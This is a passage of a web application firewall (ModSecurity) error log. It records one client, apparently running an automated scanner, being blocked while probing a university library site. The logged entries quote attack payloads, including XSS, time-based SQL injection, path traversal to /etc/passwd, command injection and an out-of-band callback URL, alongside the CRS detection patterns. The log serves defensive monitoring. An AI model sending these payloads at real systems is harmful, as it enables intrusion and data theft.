"ZO12p8Co-f0AAAcXk2EAAAAe"]
[Tue Aug 29 11:40:07.404042 2023] [:error] [pid 1569] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:email: \\x22><script>confirm(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/guest/users/forgotten"] [unique_id "ZO12p8Co-f0AAAYh9dsAAAAK"]
[Tue Aug 29 11:40:12.440583 2023] [:error] [pid 1496] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:getpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:getpage: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/cgi-bin/webproc"] [unique_id "ZO12rMCo-f0AAAXYiaIAAAAG"]
[Tue Aug 29 11:40:21.450443 2023] [:error] [pid 1499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ?/../../../../../../../../ found within ARGS:target: db_sql.php?/../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12tcCo-f0AAAXbcLcAAAAL"]
[Tue Aug 29 11:40:22.547545 2023] [:error] [pid 1687] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:q: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12tsCo-f0AAAaXqvoAAAAl"]
[Tue Aug 29 11:40:32.434254 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:var: {\\x22body\\x22:{\\x22file\\x22:\\x22file:///etc/passwd\\x22}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/sys/ui/extend/varkind/custom.jsp"] [unique_id "ZO12wMCo-f0AAAQSWlYAAAA0"]
[Tue Aug 29 11:40:33.408313 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:search. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:search: URC' union select 1,2,3,4,5,6,7,8,9,md5(999999999),11,12,13,14,15,16,17,18,19-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12wcCo-f0AAAcoNMAAAAAF"]
[Tue Aug 29 11:40:36.426091 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:var: {\\x22body\\x22:{\\x22file\\x22:\\x22file:///c://windows/win.ini\\x22}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/sys/ui/extend/varkind/custom.jsp"] [unique_id "ZO12xMCo-f0AAAQSWmUAAAA0"]
[Tue Aug 29 11:40:37.394506 2023] [:error] [pid 1673] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:sccp_id[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  (9752=9752 found within ARGS:sccp_id[]: 1) AND (SELECT 1183 FROM (SELECT(SLEEP(6)))UPad) AND (9752=9752"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO12xcCo-f0AAAaJJ7MAAAAJ"]
[Tue Aug 29 11:40:39.523864 2023] [:error] [pid 1807] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/fhem/FileLog_logWrapper"] [unique_id "ZO12x8Co-f0AAAcPiy8AAAAa"]
[Tue Aug 29 11:40:40.360034 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: # found within ARGS:username: {{username}}#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibfeb.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO12yMCo-f0AAAcYU3UAAAAp"]
[Tue Aug 29 11:40:44.441113 2023] [:error] [pid 1813] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -1 union select 1,md5(999999999),3,4,5,6,7,8,9,10-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/admin/view_car.php"] [unique_id "ZO12zMCo-f0AAAcVJQUAAAAB"]
[Tue Aug 29 11:40:44.610418 2023] [:error] [pid 1807] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:fname: test\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/Solar_Image.php"] [unique_id "ZO12zMCo-f0AAAcPizoAAAAa"]
[Tue Aug 29 11:40:46.412491 2023] [:error] [pid 1813] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:ipdm. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:ipdm: 2;id;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/dgn/dgn_tools/ping.php"] [unique_id "ZO12zsCo-f0AAAcVJQ4AAAAB"]
[Tue Aug 29 11:40:50.365352 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c found within ARGS:filepath: ..\\x5c..\\x5cWindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/fosagent/repl/download-file"] [unique_id "ZO120sCo-f0AAAcqJEoAAAAG"]
[Tue Aug 29 11:40:50.401516 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/admin/asign-single-student-subjects.php"] [unique_id "ZO120sCo-f0AAAcoNNYAAAAF"]
[Tue Aug 29 11:40:53.534850 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:name: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cWindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/fosagent/repl/download-snapshot"] [unique_id "ZO121cCo-f0AAActbEMAAAAH"]
[Tue Aug 29 11:40:55.439486 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dbPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:dbPath: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/chat/imController/showOrDownByurl.do"] [unique_id "ZO1218Co-f0AAAcYU58AAAAp"]
[Tue Aug 29 11:40:58.359846 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/admin/"] [unique_id "ZO122sCo-f0AAAYMWS0AAAAR"]
[Tue Aug 29 11:40:58.434843 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:pl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:pl: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php"] [unique_id "ZO122sCo-f0AAAcqJGQAAAAG"]
[Tue Aug 29 11:40:58.461580 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:log. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:log: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/webadmin/reporter/view_server_log.php"] [unique_id "ZO122sCo-f0AAAYMWTEAAAAR"]
[Tue Aug 29 11:40:59.395928 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gugg5exggffgo7.oast.site found within TX:1: cjmnbitjmimt14dgn26gugg5exggffgo7.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfeb.unla.ac.id"] [uri "/DnnImageHandler.ashx"] [unique_id "ZO1228Co-f0AAAcoNNwAAAAF"]
[Tue Aug 29 11:40:59.396511 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:pl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:pl: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/wp-content/plugins/mail-masta/inc/lists/csvexport.php"] [unique_id "ZO1228Co-f0AAAcYU7EAAAAp"]
[Tue Aug 29 11:41:00.359901 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/photoalbum/index.php"] [unique_id "ZO123MCo-f0AAAYf-LkAAAAD"]
[Tue Aug 29 11:41:00.399561 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:content: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/default/en_US/frame.html"] [unique_id "ZO123MCo-f0AAAYf-LsAAAAD"]
[Tue Aug 29 11:41:00.407395 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file_name: ../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/webui/"] [unique_id "ZO123MCo-f0AAAcvBcwAAAAJ"]
[Tue Aug 29 11:41:01.406899 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:UPusername. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:UPusername: \\x22><script>javascript:alert(document.cookie)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/MUP/"] [unique_id "ZO123cCo-f0AAAYf-L8AAAAD"]
[Tue Aug 29 11:41:01.585359 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO123cCo-f0AAAcbSCIAAAAv"]
[Tue Aug 29 11:41:01.659587 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sidebar. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:sidebar: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfeb.unla.ac.id"] [uri "/default/en_US/frame.A100.html"] [unique_id "ZO123cCo-f0AAActbGIAAAAH"]
[Tue Aug 29 11:41:03.564042 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:firstname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'RiUU'='RiUU found within ARGS:firstname: test' AND (SELECT 6133 FROM (SELECT(SLEEP(6)))nOqb) AND 'RiUU'='RiUU"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfeb.unla.ac.id"] [uri "/contactus.php"] [unique_id "ZO1238Co-f0AAAYf-MgAAAAD"]
[Tue Aug 29 11:41:03.604726 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:url: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibfeb.unla.ac.id"] [uri "/searchblox/servlet/FileServlet"] [unique_id "ZO1238Co-f0AAAYf-MoAAAAD"]
